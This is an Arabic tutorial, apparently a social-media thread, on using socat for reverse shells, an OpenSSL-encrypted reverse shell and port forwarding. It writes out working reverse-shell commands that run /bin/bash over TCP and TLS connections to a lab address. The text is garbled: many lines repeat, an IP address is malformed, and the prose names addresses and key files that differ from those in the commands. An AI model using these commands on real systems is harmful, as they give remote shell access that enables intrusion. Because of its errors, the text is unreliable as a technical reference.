الخيار -d يتيح وضع التصحيح لعملية التشغيل، و -d يطبع المزيد من تفاصيل تنفيذ الامر.
socat TCP4:192.168.1.15:4444 EXEC:/bin/bash
2- هذا الأمر يستخدم أداة socat لإنشاء اتصال TCP إلى عنوان IP 192.168.1.2 على المنفذ 4444 ويقوم بتنفيذ الأمر /bin/bash.
socat TCP4:192.168.1.15:4444 EXEC:/bin/bash
2- هذا الأمر يستخدم أداة socat لإنشاء اتصال TCP إلى عنوان IP 192.168.1.2 على المنفذ 4444 ويقوم بتنفيذ الأمر /bin/bash.
عند تنفيذ الأمر، يتم إنشاء اتصال TCP بين الجهاز الحالي وجهاز 192.168.1.2 على المنفذ 4444. بعد ذلك، يتم تنفيذ الأمر /bin/bash على الجهاز الهدف، مما يسمح للمستخدم بالوصول إلى نظام التشغيل وتنفيذ أوامر الشيل.
الطريقه السابقة لايتم فيها تشفير البيانات المرسلة والمستقبلة
الطريقه السابقة لايتم فيها تشفير البيانات المرسلة والمستقبلة
Encrypted Reverse Shell
openssl req -newkey rsa:2048 -nodes -keyout buhaimed.key -x509 -days 1000 -subj '/CN=buhaimedi.com Tech./C=SA' -out reverse-shell.crt
openssl req -newkey rsa:2048 -nodes -keyout buhaimed.key -x509 -days 1000 -subj '/CN=buhaimedi.com Tech./C=SA' -out reverse-shell.crt
1- هذا الأمر يستخدم أداة OpenSSL لإنشاء زوج مفاتيح جديد يستخدم خوارزمية RSA بطول 2048 بت. يتم حفظ المفتاح الخاص في ملف ignite.key، وتوليد شهادة X.509 التوقيع الذاتي وحفظها في ملف reverse-shell.crt. يتم تحديد مدة صلاحية الشهادة لمدة 1000 يوم.
cat buhaimed.key reverse-shell.crt > reverse-shell.pem
2- هذا الأمر يستخدم لدمج محتوى المفتاح الخاص buhaimed.key والشهادة reverse-shell.crt في ملف واحد يسمى reverse-shell.pem.
2- هذا الأمر يستخدم لدمج محتوى المفتاح الخاص buhaimed.key والشهادة reverse-shell.crt في ملف واحد يسمى reverse-shell.pem.
الأمر cat يستخدم لعرض محتوى الملفات، ورمز > يقوم بتحويل المحتوى إلى ملف جديد. بمجرد تنفيذ هذا الأمر، سيتم دمج محتوى المفتاح الخاص والشهادة في ملف reverse-shell.pem. يتم استخدام ملف reverse-shell.pem كملف يحتوي على المفتاح الخاص والشهادة الموقعة.
socat -OPENSSL-LISTEN:4444,cert=reverse-shell.pem,verify=0,fork EXEC:/bin/bash
3- هذا الأمر يستخدم أداة socat لإنشاء اتصال SSL/TLS للاستماع على المنفذ 4444 باستخدام شهادة الملف reverse-shell.pem.
3- هذا الأمر يستخدم أداة socat لإنشاء اتصال SSL/TLS للاستماع على المنفذ 4444 باستخدام شهادة الملف reverse-shell.pem.
الخيار -OPENSSL-LISTEN يعني أن socat سيكون قادرًا على الاستماع للاتصالات القادمة عبر SSL/TLS. يتم تعيين الملف reverse-shell.pem كشهادة للاستخدام في الاتصال. الخيار verify=0 يتجاهل التحقق من صحة الشهادة، مما يسمح بتشغيل الاتصال حتى في حالة عدم وجود شهادة موثوقة.
الخيار fork يسمح بالاتصالات المتعددة للمستخدمين المتصلين. عندما يتم إنشاء الاتصال، سيتم تنفيذ /bin/bash، مما يسمح للمتصل بالوصول إلى نظام التشغيل وتنفيذ أوامر الشيل.
socat -OPENSSL:192.168.1.154444,verify=0 EXEC:/bin/bash
هذا الأمر يستخدم أداة socat لإنشاء اتصال SSL/TLS إلى عنوان IP 192.168.1.15 على المنفذ 4444 باستخدام الشهادة الموجودة في المسار المحدد. الخيار verify=0 يتجاهل التحقق من صحة الشهادة.
هذا الأمر يستخدم أداة socat لإنشاء اتصال SSL/TLS إلى عنوان IP 192.168.1.15 على المنفذ 4444 باستخدام الشهادة الموجودة في المسار المحدد. الخيار verify=0 يتجاهل التحقق من صحة الشهادة.
بمجرد إنشاء الاتصال، سيتم تنفيذ /bin/bash، مما يسمح للمستخدم بالوصول إلى نظام التشغيل وتنفيذ أوامر الشيل.
بهذه الطريقة جميع الاتصالات سوف تكون مشفره
بهذه الطريقة جميع الاتصالات سوف تكون مشفره
Port Forward توجيه حركه البيانات
socat TCP-LISTEN:6000,fork,reuseaddr TCP:192.168.1.15:80
الأمر السابق يستخدم أداة socat لإنشاء اتصال TCP على المنفذ 6000 وتوجيه حركة المرور إلى عنوان IP 192.168.1.15 على المنفذ 80.
socat TCP-LISTEN:6000,fork,reuseaddr TCP:192.168.1.15:80
الأمر السابق يستخدم أداة socat لإنشاء اتصال TCP على المنفذ 6000 وتوجيه حركة المرور إلى عنوان IP 192.168.1.15 على المنفذ 80.
تفسير الخيارات المستخدمة في الأمر هو كالتالي:
TCP-LISTEN:6000: يقوم بإنشاء نقطة استماع TCP على المنفذ 6000 على الجهاز الحالي.
fork: يسمح بتشغيل اتصالات متعددة للعملاء الذين يتصلون بالمنفذ 6000.
reuseaddr: يسمح باستخدام نفس العنوان والمنفذ حتى بعد إغلاق الاتصال السابق على المنفذ
TCP-LISTEN:6000: يقوم بإنشاء نقطة استماع TCP على المنفذ 6000 على الجهاز الحالي.
fork: يسمح بتشغيل اتصالات متعددة للعملاء الذين يتصلون بالمنفذ 6000.
reuseaddr: يسمح باستخدام نفس العنوان والمنفذ حتى بعد إغلاق الاتصال السابق على المنفذ
.
TCP:192.168.1.15:80: يقوم بتوجيه حركة المرور إلى عنوان IP 192.168.1.15 على المنفذ 80.
بشكل عام، هذا الأمر يستخدم لتوجيه حركة المرور من المنفذ 6000 على الجهاز الحالي إلى المنفذ 80 على جهاز آخر بعنوان IP 192.168.1.15.
TCP:192.168.1.15:80: يقوم بتوجيه حركة المرور إلى عنوان IP 192.168.1.15 على المنفذ 80.
بشكل عام، هذا الأمر يستخدم لتوجيه حركة المرور من المنفذ 6000 على الجهاز الحالي إلى المنفذ 80 على جهاز آخر بعنوان IP 192.168.1.15.
يمكن استخدام هذا الأمر لإعادة توجيه حركة المرور من منفذ غير قياسي إلى منفذ قياسي مثل HTTP (المنفذ 80)، لتمكين الوصول إلى خدمات الويب على الجهاز المستقبل.
أتمنى أنكم تستمتعون بالمحتوى الذي اقدمه. إذا كانت الدروس التي اقدمها تفيدكم، فإن دعمكم باعاده التغريد سيساعدنا في الاستمرار في تقديم المزيد والأفضل!
جاري تحميل الاقتراحات...